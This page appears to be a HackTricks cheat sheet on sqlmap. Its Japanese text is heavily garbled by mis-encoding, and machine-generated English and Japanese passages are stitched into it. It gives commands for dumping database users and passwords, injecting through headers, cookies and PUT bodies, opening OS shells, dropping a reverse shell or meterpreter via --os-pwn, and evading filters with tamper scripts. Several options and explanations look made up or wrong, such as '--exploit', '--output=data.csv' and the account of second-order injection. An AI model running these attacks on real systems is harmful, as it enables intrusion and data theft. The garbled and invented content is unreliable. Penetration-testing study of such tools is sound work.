34 KiB
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
-
ãµã€ããŒã»ãã¥ãªãã£äŒç€Ÿã§åããŠããŸããïŒ HackTricksã§äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãææ°ããŒãžã§ã³ã®PEASSãå ¥æããããHackTricksãPDFã§ããŠã³ããŒããããã§ããïŒSUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
-
The PEASS FamilyãèŠã€ããŠãã ãããç¬å çãªNFTã®ã³ã¬ã¯ã·ã§ã³ã§ãã
-
å ¬åŒã®PEASSïŒHackTricksã®ã°ããºãæã«å ¥ããŸãããã
-
ð¬ Discordã°ã«ãŒããŸãã¯telegramã°ã«ãŒãã«åå ããããTwitterã§ãã©ããŒããŠãã ããðŠ@carlospolopmã
-
ãããã³ã°ã®ããªãã¯ãå ±æããã«ã¯ãhacktricksãªããžããªãšhacktricks-cloudãªããžããªã«PRãæåºããŠãã ããã
SQLmapã®åºæ¬çãªåŒæ°
äžè¬çãªåŒæ°
-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY
æ å ±ã®ååŸ
å éš
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
DBããŒã¿
The --dump option can be used to retrieve the data from the database. By default, it will dump all the tables in the database. However, you can specify the tables you want to dump using the --tables option.
$ sqlmap -u "http://example.com/vuln.php?id=1" --dump
This command will retrieve all the data from the database and display it in the console. You can also specify the output format using the --output option. For example, to save the data in a CSV file, you can use the following command:
$ sqlmap -u "http://example.com/vuln.php?id=1" --dump --output=data.csv
By default, sqlmap will retrieve all the columns from the tables. However, you can specify the columns you want to retrieve using the --columns option. For example, to retrieve only the username and password columns from the users table, you can use the following command:
$ sqlmap -u "http://example.com/vuln.php?id=1" --dump --tables=users --columns=username,password
This command will retrieve only the specified columns from the users table and display them in the console.
Remember to always use these techniques responsibly and with proper authorization.
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
ã€ã³ãžã§ã¯ã·ã§ã³ç®æ
Burp/ZAPããã®ãã£ããã£
ãªã¯ãšã¹ãããã£ããã£ããreq.txtãã¡ã€ã«ãäœæããŸãã
sqlmap -r req.txt --current-user
GETãªã¯ãšã¹ãã®ã€ã³ãžã§ã¯ã·ã§ã³
In this section, we will discuss how to perform SQL injection attacks on GET requests using sqlmap.
ãã®ã»ã¯ã·ã§ã³ã§ã¯ãsqlmapã䜿çšããŠGETãªã¯ãšã¹ãã«å¯ŸããŠSQLã€ã³ãžã§ã¯ã·ã§ã³æ»æãè¡ãæ¹æ³ã«ã€ããŠèª¬æããŸãã
Basic Usage
åºæ¬çãªäœ¿çšæ¹æ³
To perform a SQL injection attack on a GET request, you can use the following command:
GETãªã¯ãšã¹ãã«å¯ŸããŠSQLã€ã³ãžã§ã¯ã·ã§ã³æ»æãå®è¡ããã«ã¯ã次ã®ã³ãã³ãã䜿çšããŸãã
sqlmap -u "http://example.com/page.php?id=1" --dbs
Replace the URL with the target URL that contains the vulnerable parameter. The --dbs option is used to enumerate the available databases.
è匱ãªãã©ã¡ãŒã¿ãå«ã察象ã®URLã§URLã眮ãæããŸãã --dbsãªãã·ã§ã³ã¯å©çšå¯èœãªããŒã¿ããŒã¹ãåæããããã«äœ¿çšãããŸãã
Enumerating Databases
ããŒã¿ããŒã¹ã®åæ
To enumerate the databases, you can use the following command:
ããŒã¿ããŒã¹ãåæããã«ã¯ã次ã®ã³ãã³ãã䜿çšããŸãã
sqlmap -u "http://example.com/page.php?id=1" --dbs
This command will display a list of available databases.
ãã®ã³ãã³ãã¯å©çšå¯èœãªããŒã¿ããŒã¹ã®ãªã¹ãã衚瀺ããŸãã
Enumerating Tables
ããŒãã«ã®åæ
To enumerate the tables in a specific database, you can use the following command:
ç¹å®ã®ããŒã¿ããŒã¹å ã®ããŒãã«ãåæããã«ã¯ã次ã®ã³ãã³ãã䜿çšããŸãã
sqlmap -u "http://example.com/page.php?id=1" -D database_name --tables
Replace database_name with the name of the target database. This command will display a list of tables in the specified database.
database_nameã察象ããŒã¿ããŒã¹ã®ååã«çœ®ãæããŸãããã®ã³ãã³ãã¯æå®ããããŒã¿ããŒã¹å
ã®ããŒãã«ã®ãªã¹ãã衚瀺ããŸãã
Dumping Data
ããŒã¿ã®ãã³ã
To dump the data from a specific table, you can use the following command:
ç¹å®ã®ããŒãã«ããããŒã¿ããã³ãããã«ã¯ã次ã®ã³ãã³ãã䜿çšããŸãã
sqlmap -u "http://example.com/page.php?id=1" -D database_name -T table_name --dump
Replace database_name with the name of the target database and table_name with the name of the target table. This command will dump the data from the specified table.
database_nameã察象ããŒã¿ããŒã¹ã®ååã«ãtable_nameã察象ããŒãã«ã®ååã«çœ®ãæããŸãããã®ã³ãã³ãã¯æå®ããããŒãã«ããããŒã¿ããã³ãããŸãã
Conclusion
çµè«
Performing SQL injection attacks on GET requests can be done using sqlmap. By enumerating databases, tables, and dumping data, you can extract sensitive information from vulnerable web applications.
GETãªã¯ãšã¹ãã«å¯ŸããSQLã€ã³ãžã§ã¯ã·ã§ã³æ»æã¯ãsqlmapã䜿çšããŠè¡ãããšãã§ããŸããããŒã¿ããŒã¹ã®åæãããŒãã«ã®åæãããŒã¿ã®ãã³ããè¡ãããšã§ãè匱ãªWebã¢ããªã±ãŒã·ã§ã³ããæ©å¯æ å ±ãæœåºããããšãã§ããŸãã
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
POSTãªã¯ãšã¹ãã®ã€ã³ãžã§ã¯ã·ã§ã³
In some cases, the target application may use POST requests to send data to the server. SQL injection can also be performed on these POST requests. SQLMap provides options to specify the POST data and the injection point.
ããã€ãã®å Žåã察象ã®ã¢ããªã±ãŒã·ã§ã³ã¯ããŒã¿ããµãŒããŒã«éä¿¡ããããã«POSTãªã¯ãšã¹ãã䜿çšããå ŽåããããŸãããããã®POSTãªã¯ãšã¹ãã§ãSQLã€ã³ãžã§ã¯ã·ã§ã³ãå®è¡ããããšãã§ããŸããSQLMapã¯ãPOSTããŒã¿ãšã€ã³ãžã§ã¯ã·ã§ã³ãã€ã³ããæå®ããããã®ãªãã·ã§ã³ãæäŸããŠããŸãã
To perform a SQL injection on a POST request, you need to capture the request using a proxy tool like Burp Suite or OWASP ZAP. Once you have the request captured, you can use SQLMap to automatically detect and exploit the SQL injection vulnerability.
POSTãªã¯ãšã¹ãã§SQLã€ã³ãžã§ã¯ã·ã§ã³ãå®è¡ããã«ã¯ãBurp SuiteãOWASP ZAPãªã©ã®ãããã·ããŒã«ã䜿çšããŠãªã¯ãšã¹ãããã£ããã£ããå¿ èŠããããŸãããªã¯ãšã¹ãããã£ããã£ããããSQLMapã䜿çšããŠSQLã€ã³ãžã§ã¯ã·ã§ã³ã®è匱æ§ãèªåçã«æ€åºããæ»æããããšãã§ããŸãã
To specify the POST data, you can use the --data option followed by the POST data in the format param1=value1¶m2=value2. You can also use the --data-file option to specify a file containing the POST data.
POSTããŒã¿ãæå®ããã«ã¯ã--dataãªãã·ã§ã³ã䜿çšããPOSTããŒã¿ãparam1=value1¶m2=value2ã®åœ¢åŒã§æå®ããŸãããŸããPOSTããŒã¿ãå«ãŸãããã¡ã€ã«ãæå®ããã«ã¯ã--data-fileãªãã·ã§ã³ã䜿çšããããšãã§ããŸãã
To specify the injection point, you can use the --param option followed by the parameter name. For example, --param username will specify the injection point as the username parameter.
ã€ã³ãžã§ã¯ã·ã§ã³ãã€ã³ããæå®ããã«ã¯ã--paramãªãã·ã§ã³ã䜿çšãããã©ã¡ãŒã¿åãæå®ããŸããäŸãã°ã--param usernameã¯ã€ã³ãžã§ã¯ã·ã§ã³ãã€ã³ããusernameãã©ã¡ãŒã¿ãšããŠæå®ããŸãã
Once you have specified the POST data and the injection point, you can run SQLMap with the --data and --param options to perform the SQL injection on the POST request.
POSTããŒã¿ãšã€ã³ãžã§ã¯ã·ã§ã³ãã€ã³ããæå®ããããSQLMapã--dataãªãã·ã§ã³ãš--paramãªãã·ã§ã³ãšå
±ã«å®è¡ããPOSTãªã¯ãšã¹ãã«å¯ŸããŠSQLã€ã³ãžã§ã¯ã·ã§ã³ãå®è¡ããããšãã§ããŸãã
sqlmap -u "http://example.com" --data "username=*&password=*"
ããããŒãšãã®ä»ã®HTTPã¡ãœããã«ãããã€ã³ãžã§ã¯ã·ã§ã³
In some cases, it is possible to perform SQL injections not only in the request parameters but also in the headers or other HTTP methods. This can be useful when the application uses headers or other methods to pass data to the backend database.
ããã€ãã®ã±ãŒã¹ã§ã¯ãSQLã€ã³ãžã§ã¯ã·ã§ã³ããªã¯ãšã¹ããã©ã¡ãŒã¿ã ãã§ãªããããããŒããã®ä»ã®HTTPã¡ãœããã«ãå®è¡ããããšãã§ããŸããããã¯ãã¢ããªã±ãŒã·ã§ã³ãããããŒããã®ä»ã®ã¡ãœããã䜿çšããŠããã¯ãšã³ãããŒã¿ããŒã¹ã«ããŒã¿ãæž¡ãå Žåã«åœ¹ç«ã¡ãŸãã
Injection in Headers
User-Agent Header
The User-Agent header is commonly used by web browsers to identify themselves to the server. In some cases, it is possible to inject SQL code into this header and manipulate the backend database.
ãŠãŒã¶ãŒãšãŒãžã§ã³ãããããŒã¯ããŠã§ããã©ãŠã¶ããµãŒããŒã«èªèº«ãèå¥ããããã«äžè¬çã«äœ¿çšãããŸããããã€ãã®ã±ãŒã¹ã§ã¯ããã®ããããŒã«SQLã³ãŒããã€ã³ãžã§ã¯ã·ã§ã³ããããã¯ãšã³ãããŒã¿ããŒã¹ãæäœããããšãå¯èœã§ãã
To test for SQL injection in the User-Agent header, you can use the following command:
ãŠãŒã¶ãŒãšãŒãžã§ã³ãããããŒã«å¯ŸããSQLã€ã³ãžã§ã¯ã·ã§ã³ããã¹ãããã«ã¯ã次ã®ã³ãã³ãã䜿çšã§ããŸãã
sqlmap -u "http://example.com" --headers="User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'; SELECT SLEEP(5)-- -"
Referer Header
The Referer header is used to indicate the URL of the page that linked to the current page. Similar to the User-Agent header, it is possible to inject SQL code into this header and manipulate the backend database.
ãªãã¡ã©ããããŒã¯ãçŸåšã®ããŒãžã«ãªã³ã¯ããããŒãžã®URLã瀺ãããã«äœ¿çšãããŸãããŠãŒã¶ãŒãšãŒãžã§ã³ãããããŒãšåæ§ã«ããã®ããããŒã«SQLã³ãŒããã€ã³ãžã§ã¯ã·ã§ã³ããããã¯ãšã³ãããŒã¿ããŒã¹ãæäœããããšãå¯èœã§ãã
To test for SQL injection in the Referer header, you can use the following command:
ãªãã¡ã©ããããŒã«å¯ŸããSQLã€ã³ãžã§ã¯ã·ã§ã³ããã¹ãããã«ã¯ã次ã®ã³ãã³ãã䜿çšã§ããŸãã
sqlmap -u "http://example.com" --headers="Referer: http://example.com'; SELECT SLEEP(5)-- -"
Injection in Other HTTP Methods
Apart from GET and POST requests, there are other HTTP methods that can be used to send data to the server. These methods include PUT, DELETE, OPTIONS, HEAD, and more. It is possible to inject SQL code into these methods and manipulate the backend database.
GETãšPOSTãªã¯ãšã¹ã以å€ã«ããããŒã¿ããµãŒããŒã«éä¿¡ããããã«äœ¿çšã§ããä»ã®HTTPã¡ãœããããããŸãããããã®ã¡ãœããã«ã¯ãPUTãDELETEãOPTIONSãHEADãªã©ããããŸãããããã®ã¡ãœããã«SQLã³ãŒããã€ã³ãžã§ã¯ã·ã§ã³ããããã¯ãšã³ãããŒã¿ããŒã¹ãæäœããããšãå¯èœã§ãã
To test for SQL injection in other HTTP methods, you can use the following command:
ä»ã®HTTPã¡ãœããã«å¯ŸããSQLã€ã³ãžã§ã¯ã·ã§ã³ããã¹ãããã«ã¯ã次ã®ã³ãã³ãã䜿çšã§ããŸãã
sqlmap -u "http://example.com" --method=PUT --data="param1=value1¶m2=value2'; SELECT SLEEP(5)-- -"
Remember to replace the URL, headers, and data with the appropriate values for your target application.
察象ã®ã¢ããªã±ãŒã·ã§ã³ã«é©åãªå€ã§URLãããããŒãããã³ããŒã¿ã眮ãæããããšãå¿ããªãã§ãã ããã
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"
#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'
ã»ã«ã³ããªãŒããŒã€ã³ãžã§ã¯ã·ã§ã³
A second order injection occurs when user input is stored in a database or other data storage system, and later used in a different context without proper sanitization or validation. This can lead to SQL injection vulnerabilities that are not immediately apparent during the initial input, but can be exploited later on.
ã»ã«ã³ããªãŒããŒã€ã³ãžã§ã¯ã·ã§ã³ã¯ããŠãŒã¶ãŒã®å ¥åãããŒã¿ããŒã¹ãä»ã®ããŒã¿ã¹ãã¬ãŒãžã·ã¹ãã ã«ä¿åãããåŸã§é©åãªãµãã¿ã€ãºãããªããŒã·ã§ã³ãªãã«å¥ã®ã³ã³ããã¹ãã§äœ¿çšãããå Žåã«çºçããŸããããã«ãããæåã®å ¥åæã«ã¯ããã«ã¯æããã«ãªããªãSQLã€ã³ãžã§ã¯ã·ã§ã³ã®è匱æ§ãçããå¯èœæ§ããããŸãããåŸã§æªçšãããå¯èœæ§ããããŸãã
For example, let's say a web application allows users to submit comments that are stored in a database. The application then retrieves these comments and displays them on a webpage. If the application does not properly sanitize or validate the comments before displaying them, an attacker could inject malicious SQL code into their comment. This code would then be stored in the database and executed when the comments are displayed on the webpage, potentially leading to unauthorized access or data leakage.
ããšãã°ããŠã§ãã¢ããªã±ãŒã·ã§ã³ããŠãŒã¶ãŒã«ã³ã¡ã³ããæåºããããšãèš±å¯ãããããã®ã³ã¡ã³ããããŒã¿ããŒã¹ã«ä¿åããããšããŸãããã®åŸãã¢ããªã±ãŒã·ã§ã³ã¯ãããã®ã³ã¡ã³ããååŸãããŠã§ãããŒãžäžã«è¡šç€ºããŸããã¢ããªã±ãŒã·ã§ã³ãã³ã¡ã³ãã衚瀺ããåã«é©åã«ãµãã¿ã€ãºãããªããŒã·ã§ã³ãè¡ããªãå Žåãæ»æè ã¯ã³ã¡ã³ãã«æªæã®ããSQLã³ãŒããã€ã³ãžã§ã¯ã·ã§ã³ããããšãã§ããŸãããã®ã³ãŒãã¯ããŒã¿ããŒã¹ã«ä¿åãããã³ã¡ã³ãããŠã§ãããŒãžäžã«è¡šç€ºãããéã«å®è¡ããããããäžæ£ãªã¢ã¯ã»ã¹ãããŒã¿ã®æŒæŽ©ã®å¯èœæ§ããããŸãã
To detect and exploit second order injection vulnerabilities, tools like SQLMap can be used. These tools analyze the application's behavior and attempt to inject malicious SQL code to test for vulnerabilities. By identifying and fixing these vulnerabilities, developers can ensure the security of their applications and protect against potential attacks.
ã»ã«ã³ããªãŒããŒã€ã³ãžã§ã¯ã·ã§ã³ã®è匱æ§ãæ€åºããæªçšããããã«ã¯ãSQLMapãªã©ã®ããŒã«ã䜿çšããããšãã§ããŸãããããã®ããŒã«ã¯ã¢ããªã±ãŒã·ã§ã³ã®åäœãåæããè匱æ§ããã¹ãããããã«æªæã®ããSQLã³ãŒããã€ã³ãžã§ã¯ã·ã§ã³ããããšããŸãããããã®è匱æ§ãç¹å®ãä¿®æ£ããããšã§ãéçºè ã¯ã¢ããªã±ãŒã·ã§ã³ã®ã»ãã¥ãªãã£ã確ä¿ããæœåšçãªæ»æããä¿è·ããããšãã§ããŸãã
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
ã·ã§ã«
Shellã³ãã³ããå®è¡ããããã«ãSQLMapã¯ããã€ãã®ãªãã·ã§ã³ãæäŸããŠããŸãã以äžã«ããã€ãã®äžè¬çãªãªãã·ã§ã³ã瀺ããŸãã
--os-shell
ãã®ãªãã·ã§ã³ã䜿çšãããšãSQLMapã¯OSã·ã§ã«ãéããŸããããã«ããã察象ã®ã·ã¹ãã ã§ã³ãã³ããå®è¡ããããšãã§ããŸãã
sqlmap -u <target> --os-shell
--sql-shell
ãã®ãªãã·ã§ã³ã䜿çšãããšãSQLMapã¯SQLã·ã§ã«ãéããŸããããã«ããã察象ã®ããŒã¿ããŒã¹ã«å¯ŸããŠSQLã¯ãšãªãå®è¡ããããšãã§ããŸãã
sqlmap -u <target> --sql-shell
--os-pwn
ãã®ãªãã·ã§ã³ã䜿çšãããšãSQLMapã¯å¯Ÿè±¡ã®ã·ã¹ãã ãå®å šã«ä¹ã£åããŸããããã«ããã察象ã®ã·ã¹ãã ã§ä»»æã®ã³ãã³ããå®è¡ããããšãã§ããŸãã
sqlmap -u <target> --os-pwn
--os-bof
ãã®ãªãã·ã§ã³ã䜿çšãããšãSQLMapã¯å¯Ÿè±¡ã®ã·ã¹ãã ã§ãããã¡ãªãŒããŒãããŒãåŒãèµ·ãããŸããããã«ããã察象ã®ã·ã¹ãã ãã¯ã©ãã·ã¥ãããããšãã§ããŸãã
sqlmap -u <target> --os-bof
ãããã®ãªãã·ã§ã³ã䜿çšããéã«ã¯ãæ éã«è¡åããæ³çãªå¶çŽãéµå®ããããšãå¿ããªãã§ãã ããã
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
SQLmapã䜿çšããŠãŠã§ããµã€ããã¯ããŒã«ããèªåçã«ãšã¯ã¹ããã€ããã
SQLmap is a powerful tool for automating the process of detecting and exploiting SQL injection vulnerabilities in web applications. In this section, we will learn how to use SQLmap to crawl a website and automatically exploit any SQL injection vulnerabilities that are found.
SQLmapã¯ããŠã§ãã¢ããªã±ãŒã·ã§ã³ã®SQLã€ã³ãžã§ã¯ã·ã§ã³è匱æ§ãæ€åºãããšã¯ã¹ããã€ãããããã»ã¹ãèªååãã匷åãªããŒã«ã§ãããã®ã»ã¯ã·ã§ã³ã§ã¯ãSQLmapã䜿çšããŠãŠã§ããµã€ããã¯ããŒã«ããèŠã€ãã£ãSQLã€ã³ãžã§ã¯ã·ã§ã³è匱æ§ãèªåçã«ãšã¯ã¹ããã€ãããæ¹æ³ãåŠã³ãŸãã
Crawling a website with SQLmap
SQLmap has a built-in feature that allows it to crawl a website and discover all the available pages. This can be useful when you want to identify potential targets for SQL injection attacks.
To crawl a website with SQLmap, you can use the following command:
sqlmap -u <target_url> --crawl=<depth>
<target_url>: The URL of the website you want to crawl.<depth>: The depth of the crawling process (optional). By default, SQLmap will crawl up to a depth of 3.
For example, to crawl a website at http://example.com up to a depth of 5, you can use the following command:
sqlmap -u http://example.com --crawl=5
Auto-exploiting SQL injection vulnerabilities
Once SQLmap has crawled a website and identified SQL injection vulnerabilities, it can automatically exploit them to extract data from the database or perform other malicious actions.
To auto-exploit SQL injection vulnerabilities with SQLmap, you can use the following command:
sqlmap -u <target_url> --exploit=<exploit_options>
<target_url>: The URL of the website with the SQL injection vulnerability.<exploit_options>: Additional options to customize the exploitation process (optional).
For example, to auto-exploit a SQL injection vulnerability on http://example.com/vulnerable.php?id=1, you can use the following command:
sqlmap -u http://example.com/vulnerable.php?id=1 --exploit
SQLmap will automatically detect and exploit the SQL injection vulnerability, allowing you to retrieve data from the database or perform other actions as specified by the exploit options.
Conclusion
By using SQLmap to crawl a website and auto-exploit SQL injection vulnerabilities, you can efficiently identify and exploit potential security weaknesses in web applications. However, it is important to always obtain proper authorization before performing any penetration testing activities.
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
You can customize the injection by setting a suffix.
To set a suffix, use the --suffix option followed by the desired suffix value.
For example, to set the suffix as ' OR '1'='1'--, you can use the following command:
sqlmap -u <target_url> --suffix="' OR '1'='1'--"
This will append the suffix to the injected payload, allowing you to modify the behavior of the injection.
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
ãã¬ãã£ãã¯ã¹
Target
ã¿ãŒã²ãã
Introduction
ã€ã³ãããã¯ã·ã§ã³
SQL Injection
SQLã€ã³ãžã§ã¯ã·ã§ã³
SQLMap
SQLMap
Installation
ã€ã³ã¹ããŒã«
Basic Usage
åºæ¬çãªäœ¿çšæ¹æ³
Detecting SQL Injection Vulnerabilities
SQLã€ã³ãžã§ã¯ã·ã§ã³ã®è匱æ§ã®æ€åº
Enumerating Databases
ããŒã¿ããŒã¹ã®åæ
Enumerating Tables
ããŒãã«ã®åæ
Enumerating Columns
åã®åæ
Dumping Data
ããŒã¿ã®ãã³ã
Exploiting SQL Injection Vulnerabilities
SQLã€ã³ãžã§ã¯ã·ã§ã³ã®è匱æ§ã®æªçš
Command Execution
ã³ãã³ãã®å®è¡
OS Shell
OSã·ã§ã«
File Read/Write
ãã¡ã€ã«ã®èªã¿æžã
Privilege Escalation
ç¹æš©ã®ææ Œ
Conclusion
çµè«
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
ããŒã«ã€ã³ãžã§ã¯ã·ã§ã³ã®æ€åºæ¹æ³ã®ãã«ã
Boolean-based SQL injectionïŒããŒã«ããŒã¹ã®SQLã€ã³ãžã§ã¯ã·ã§ã³ïŒã¯ãWebã¢ããªã±ãŒã·ã§ã³ã®ã»ãã¥ãªãã£ãã¹ãäžã«ãã䜿çšããããã¯ããã¯ã§ãããã®æ»æã¯ãçåœå€ïŒtrueãŸãã¯falseïŒã䜿çšããŠSQLã¯ãšãªã®çµæãå¶åŸ¡ããããšã«ãã£ãŠãããŒã¿ããŒã¹ããæ å ±ãæœåºããŸãã
以äžã¯ãããŒã«ã€ã³ãžã§ã¯ã·ã§ã³ãæ€åºããããã®æé ã§ãã
-
ãŠãŒã¶ãŒå ¥åã®ç¹å®ã®ç®æãç¹å®ããŸããããã¯ãURLãã©ã¡ãŒã¿ããã©ãŒã ãã£ãŒã«ãããŸãã¯ã¯ãããŒãªã©ã®å Žæã«ååšããå¯èœæ§ããããŸãã
-
ç¹å®ãããŠãŒã¶ãŒå ¥åã䜿çšããŠãSQLã¯ãšãªãå®è¡ããå Žæãç¹å®ããŸããããã¯ãããŒã¿ããŒã¹ã¯ãšãªãå®è¡ããã³ãŒãã®äžéšã§ããå¯èœæ§ããããŸãã
-
ç¹å®ãããŠãŒã¶ãŒå ¥åã䜿çšããŠãSQLã¯ãšãªã«ããŒã«æŒç®åïŒANDãORãNOTïŒãæ¿å ¥ããŸããããã«ãããã¯ãšãªã®çµæãå¶åŸ¡ã§ããŸãã
-
ã¯ãšãªã®çµæã«åºã¥ããŠãçåœå€ã䜿çšããŠæ¡ä»¶ãè©äŸ¡ããŸããäŸãã°ãã¯ãšãªãçã®å Žåã¯æ£åžžãªå¿çãè¿ãããåœã®å Žåã¯ãšã©ãŒã¡ãã»ãŒãžã衚瀺ããããããããŸããã
-
ããŒã«ã€ã³ãžã§ã¯ã·ã§ã³ãæåããå ŽåãããŒã¿ããŒã¹ããæ å ±ãæœåºããããã®é©åãªçåœå€ãç¹å®ããŸãã
ããŒã«ã€ã³ãžã§ã¯ã·ã§ã³ã¯ãããŒã¿ããŒã¹ã®æ©å¯æ å ±ãæŒæŽ©ãããå¯èœæ§ããããããã»ãã¥ãªãã£äžã®é倧ãªè匱æ§ã§ããã»ãã¥ãªãã£ãã¹ãäžã«ãã®ãã¯ããã¯ã䜿çšããéã«ã¯ãæ éã«è¡ãå¿ èŠããããŸãã
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
ã¿ã³ããŒ
Tampering is a technique used to modify the behavior of SQLMap's payloads in order to bypass security measures or evade detection. SQLMap provides a variety of tamper scripts that can be used to alter the SQL injection payloads.
ã¿ã³ããªã³ã°ã¯ãã»ãã¥ãªãã£å¯Ÿçãåé¿ãããæ€åºãåé¿ããããã«ãSQLMapã®ãã€ããŒãã®åäœãå€æŽããããã®æè¡ã§ããSQLMapã¯ãSQLã€ã³ãžã§ã¯ã·ã§ã³ã®ãã€ããŒããå€æŽããããã«äœ¿çšã§ããããŸããŸãªã¿ã³ããŒã¹ã¯ãªãããæäŸããŠããŸãã
To use a tamper script, you can specify it using the --tamper option followed by the name of the script. For example:
ã¿ã³ããŒã¹ã¯ãªããã䜿çšããã«ã¯ãã¹ã¯ãªããã®ååãæå®ããããã«--tamperãªãã·ã§ã³ã䜿çšããŸããäŸãã°ïŒ
sqlmap -u http://example.com/index.php?id=1 --tamper=space2comment
This command will use the space2comment tamper script to modify the SQL injection payloads.
ãã®ã³ãã³ãã¯ãSQLã€ã³ãžã§ã¯ã·ã§ã³ã®ãã€ããŒããå€æŽããããã«space2commentã¿ã³ããŒã¹ã¯ãªããã䜿çšããŸãã
You can also use multiple tamper scripts by separating them with a comma:
ã«ã³ãã§åºåã£ãŠè€æ°ã®ã¿ã³ããŒã¹ã¯ãªããã䜿çšããããšãã§ããŸãã
sqlmap -u http://example.com/index.php?id=1 --tamper=space2comment,randomcase
In this example, both the space2comment and randomcase tamper scripts will be applied to the SQL injection payloads.
ãã®äŸã§ã¯ãspace2commentãšrandomcaseã®äž¡æ¹ã®ã¿ã³ããŒã¹ã¯ãªãããSQLã€ã³ãžã§ã¯ã·ã§ã³ã®ãã€ããŒãã«é©çšãããŸãã
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
| Tamper | 説æ |
|---|---|
| apostrophemask.py | ã¢ãã¹ãããã£æåããã®UTF-8å šè§å¯Ÿå¿æåã«çœ®ãæããŸã |
| apostrophenullencode.py | ã¢ãã¹ãããã£æåããã®äžæ£ãªããã«ãŠãã³ãŒã察å¿æåã«çœ®ãæããŸã |
| appendnullbyte.py | ãã€ããŒãã®æ«å°Ÿã«ãšã³ã³ãŒããããNULLãã€ãæåãè¿œå ããŸã |
| base64encode.py | æå®ããããã€ããŒãå ã®ãã¹ãŠã®æåãBase64ã§ãšã³ã³ãŒãããŸã |
| between.py | 倧ãªãæŒç®å '>' ã 'NOT BETWEEN 0 AND #' ã«çœ®ãæããŸã |
| bluecoat.py | SQLæã®åŸã«ããã¹ããŒã¹æåãæå¹ãªã©ã³ãã ãªç©ºçœæåã«çœ®ãæããŸãããã®åŸãæå = ãLIKEæŒç®åã«çœ®ãæããŸã |
| chardoubleencode.py | æå®ããããã€ããŒãå ã®ãã¹ãŠã®æåãããã«URLãšã³ã³ãŒãããŸãïŒãã§ã«ãšã³ã³ãŒããããŠãããã®ã¯åŠçããŸããïŒ |
| commalesslimit.py | 'LIMIT M, N' ã®ãããªã€ã³ã¹ã¿ã³ã¹ã 'LIMIT N OFFSET M' ã«çœ®ãæããŸã |
| commalessmid.py | 'MID(A, B, C)' ã®ãããªã€ã³ã¹ã¿ã³ã¹ã 'MID(A FROM B FOR C)' ã«çœ®ãæããŸã |
| concat2concatws.py | 'CONCAT(A, B)' ã®ãããªã€ã³ã¹ã¿ã³ã¹ã 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' ã«çœ®ãæããŸã |
| charencode.py | æå®ããããã€ããŒãå ã®ãã¹ãŠã®æåãURLãšã³ã³ãŒãããŸãïŒãã§ã«ãšã³ã³ãŒããããŠãããã®ã¯åŠçããŸããïŒ |
| charunicodeencode.py | æå®ããããã€ããŒãå ã®éãšã³ã³ãŒãæåãUnicode URLãšã³ã³ãŒãããŸãïŒãã§ã«ãšã³ã³ãŒããããŠãããã®ã¯åŠçããŸããïŒã"%u0022" |
| charunicodeescape.py | æå®ããããã€ããŒãå ã®éãšã³ã³ãŒãæåãUnicode URLãšã³ã³ãŒãããŸãïŒãã§ã«ãšã³ã³ãŒããããŠãããã®ã¯åŠçããŸããïŒã"\u0022" |
| equaltolike.py | ãã¹ãŠã®çå·æŒç®å '=' ã 'LIKE' æŒç®åã«çœ®ãæããŸã |
| escapequotes.py | ã¯ã©ãŒãæå ' and " ãã¹ã©ãã·ã¥ã§ãšã¹ã±ãŒãããŸã |
| greatest.py | 倧ãªãæŒç®å '>' ã 'GREATEST' ã«çœ®ãæããŸã |
| halfversionedmorekeywords.py | åããŒã¯ãŒãã®åã«ããŒãžã§ã³ä»ãã®MySQLã³ã¡ã³ããè¿œå ããŸã |
| ifnull2ifisnull.py | 'IFNULL(A, B)' ã®ãããªã€ã³ã¹ã¿ã³ã¹ã 'IF(ISNULL(A), B, A)' ã«çœ®ãæããŸã |
| modsecurityversioned.py | ããŒãžã§ã³ä»ãã³ã¡ã³ãã§ã¯ãšãªå šäœãå²ã¿ãŸã |
